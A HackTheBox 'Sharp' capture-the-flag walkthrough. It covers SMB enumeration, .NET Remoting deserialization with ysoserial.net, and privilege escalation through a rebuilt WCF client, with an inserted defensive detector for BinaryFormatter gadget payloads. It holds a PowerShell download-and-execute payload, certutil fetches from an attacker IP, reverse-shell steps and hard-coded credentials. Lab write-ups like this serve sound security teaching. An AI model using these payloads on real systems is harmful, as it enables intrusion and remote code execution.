Hackthebox Sharp WriteUp

Jim Solomon
6 min read, May 1, 2021

Overview:

Sharp is a hard Windows machine that exploits a .NET Remoting server and WCF (Windows Communication Foundation), and both parts must be done in a Windows environment. There are public exploits (recompiled) from 2014, but they require quite a bit of setup before they can be run, including serializing the payload. After getting a shell, there is a wcf folder and a WcfClient exe that runs with admin privileges; by looking at the source code in Visual Studio, the attacker can take advantage of the Main function, rebuild the exe and run it on the victim's machine to escalate privileges to Administrator. With all that being said, let's just jump in!

Recon:

┌──(root💀kali)-[~/htb/boxes/sharp]
└─# cat all
# Nmap 7.91 scan initiated Sun Apr 25 16:08:08 2021 as: nmap -sC -sV -p- -oN all -v -Pn 10.10.10.219
Nmap scan report for 10.10.10.219
Host is up (0.065s latency).
Not shown: 65529 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8888/tcp open msexchange-logcopier Microsoft Exchange 2010 log copier
8889/tcp open mc-nmf .NET Message Framing
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 1m26s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-04-25T20:16:11
|_ start_date: N/A
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 25 16:15:22 2021 -- 1 IP address (1 host up) scanned in 434.84 seconds

Run smbclient

┌──(root💀kali)-[~/htb/boxes/sharp]
└─# smbclient -L //10.10.10.219/
Enter WORKGROUP\root's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
dev Disk
IPC$ IPC Remote IPC
kanban Disk
SMB1 disabled -- no workgroup available

Get all the files.

This is a Portable Kanban install, and I'm going to search for exploits for that.

Use the exploit with the path of the PortableKanban.pk3 file we downloaded earlier. We get some credentials. So first off, I will try crackmapexec to check whether any of the SMB shares are accessible with them.

Found that the user lars can access the dev SMB share.

┌──(root💀kali)-[~/htb/boxes/sharp/dev]
└─# cat notes.txt
Todo:
Migrate from .Net remoting to WCF
Add input validation

There is a notes.txt that indicates that it is a .NET Remoting server, and there are blogs about that.

https://downloads.immunityinc.com/infiltrate2019-slidepacks/christopher-anastasio-abusing-insecure-wcf-endpoints-for-profit-and-fun/abusing_wcf_endpoints.pdf

Download these files and analyse them with dnSpy on a Windows VM; dnSpy can decompile and recompile exe files, so we can check what they are doing.

// decompiled from the client: endpoint and hard-coded debug credentials
Activator.GetObject(typeof(Remoting), "tcp://localhost:8888/SecretSharpDebugApplicationEndpoint");
channelSinkProperties["username"] = "debug";
channelSinkProperties["password"] = "SharpApplicationDebugUserPassword123!";

There is a pre-compiled exploit for .NET Remoting (ExploitRemotingService).

Before running the exploit, we need to set up a few things on a Windows VM.

1. Web hosting with node.js (you can use Python if you want). Download and install node.js from the link below and run http-server.cmd -p 80 to host the files.

2. nc64.exe

3. A PowerShell reverse shell.

4. ysoserial.net to serialize the reverse shell payload.

Start attacking

1. Generate a serialized reverse shell:

ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell -c IEX(new-object net.webclient).downloadstring('http://10.10.14.16/shell.ps1')"

2. Host the web server with the PowerShell reverse shell.

3. Start the nc64.exe listener.

4. Use the exploit with the payload to get a shell:

ExploitRemotingService.exe -s --user=debug --pass="SharpApplicationDebugUserPassword123!" tcp://10.10.10.219:8888/SecretSharpDebugApplicationEndpoint raw [Serialized Payload here]
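From the defender's side, the thing to catch is the payload step 1 produces: a base64-encoded BinaryFormatter stream carrying a gadget chain. The following detector is an added example, not code from the original post; it checks for the MS-NRBF serialization header and for type names that typically appear in ysoserial.net gadget chains such as TypeConfuseDelegate. The sample input is constructed here, not real ysoserial output.

```python
import base64
import struct

# Type names that show up in the serialized form of common ysoserial.net gadget
# chains (TypeConfuseDelegate uses a SortedSet whose comparer wraps a delegate
# to Process.Start). Any of these inside a message bound for a .NET Remoting
# or WCF endpoint is a strong deserialization-attack indicator.
GADGET_MARKERS = (
    b"System.DelegateSerializationHolder",
    b"System.Diagnostics.Process",
    b"System.Collections.Generic.SortedSet`1",
)


def is_binaryformatter_stream(data: bytes) -> bool:
    """MS-NRBF SerializationHeaderRecord: record type 0x00, then rootId,
    headerId, majorVersion (must be 1) and minorVersion (must be 0), each int32."""
    if len(data) < 17 or data[0] != 0x00:
        return False
    _root_id, _header_id, major, minor = struct.unpack_from("<iiii", data, 1)
    return major == 1 and minor == 0


def scan_payload(b64: str) -> dict:
    """Decode a base64 message body and report whether it looks like a
    BinaryFormatter stream that carries known gadget-chain types."""
    try:
        data = base64.b64decode(b64, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return {"binaryformatter": False, "markers": [], "suspicious": False}
    markers = [m.decode() for m in GADGET_MARKERS if m in data]
    bf = is_binaryformatter_stream(data)
    return {"binaryformatter": bf, "markers": markers, "suspicious": bf and bool(markers)}


def make_sample(body: bytes) -> str:
    """Constructed test input (not a real ysoserial stream): a valid MS-NRBF
    header followed by arbitrary bytes, base64-encoded like ysoserial -o base64."""
    header = b"\x00" + struct.pack("<iiii", 1, -1, 1, 0)
    return base64.b64encode(header + body).decode()


if __name__ == "__main__":
    bad = make_sample(b"..System.Collections.Generic.SortedSet`1.."
                      b"System.DelegateSerializationHolder..System.Diagnostics.Process..")
    good = make_sample(b"..System.String..hello..")
    print(scan_payload(bad))   # suspicious: True, three markers
    print(scan_payload(good))  # suspicious: False
```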

PrivEsc to Administrator:

Poking around, I found a wcf folder.

Compress it and copy it to C:\dev:

Compress-Archive -LiteralPath C:\users\lars\Documents\wcf -DestinationPath C:\users\lars\Documents\wcf.zip
move-item -path C:\users\lars\Documents\wcf.zip -destination c:\dev

On the Windows VM, run this with lars's credentials:

net use X: \\10.10.10.219\dev

We have mounted the dev share on the Windows VM.

The wcf zip file contains a wcf.sln that can be opened and modified in Visual Studio.

Note that it is listening on port 8889 and running as a privileged user. So what if we add a reverse shell and rebuild it? If it executes in that context, we might get an Administrator shell.

Let's add a PowerShell reverse shell command and rebuild the file.

From the WcfClient build directory, download WcfClient.exe and WcfRemotingLibrary.dll to the target machine where we have the lars shell:

certutil -urlcache -f "http://10.10.14.16/WcfClient.exe" WcfClient.exe
certutil -urlcache -f "http://10.10.14.16/WcfRemotingLibrary.dll" WcfRemotingLibrary.dll

Run WcfClient.exe to get a shell.

Note that it executes with admin privileges, so we are now nt authority\system.

Jim Solomon

Christian, Studying Cyber Security and Digital Forensics, Security Consultant at 12security.com | OSCP